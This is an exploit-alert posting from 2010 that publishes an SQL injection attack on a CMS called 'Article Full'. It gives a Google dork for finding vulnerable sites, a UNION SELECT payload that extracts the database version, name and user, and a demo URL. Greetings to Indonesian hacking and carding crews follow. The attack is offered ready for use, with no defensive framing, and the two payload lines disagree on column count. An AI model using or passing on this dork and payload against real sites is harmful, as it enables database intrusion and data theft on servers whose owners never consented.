|    |    |    | Today: 23-Oct-2019 |

CMS Article Full SQL Injection

December 3, 2010 | Posted in ExploitAlert

===========================================
CMS Article Full SQL Injection
===========================================

[+]Title : CMS Article Full SQL Injection
[+]Software : Article Full
[+]Vendor : NN
[+]Download : NN
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home : http://josalijoe.wordpress.com/


.___ .___ .__ _________ .___
| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/


########################################################################

Dork : inurl:"article_full.php?id="

########################################################################

------------------------------------------------------------------------

SQL Exploit

Exploit : -99999+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23/*

Demo

Exploit : http://127.0.0.1/article_full.php?id=-99999+union+select+1,2,3,4,5,c oncat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

--------------------------------------------------------------------------


Greets For :

./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew

./Byroe Net - Yogya Carderlink - anten4 - Wannabe Hacker - DuniaSantai.com - All Underground Forum Indonesia

My Team : ./Indonesian Coder

Special Thanks :

Security Reason - Packetstorm Security


[+] Note :

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

Taged in: CMS, Exploit, indonesian hacker, SQL, version database, yogya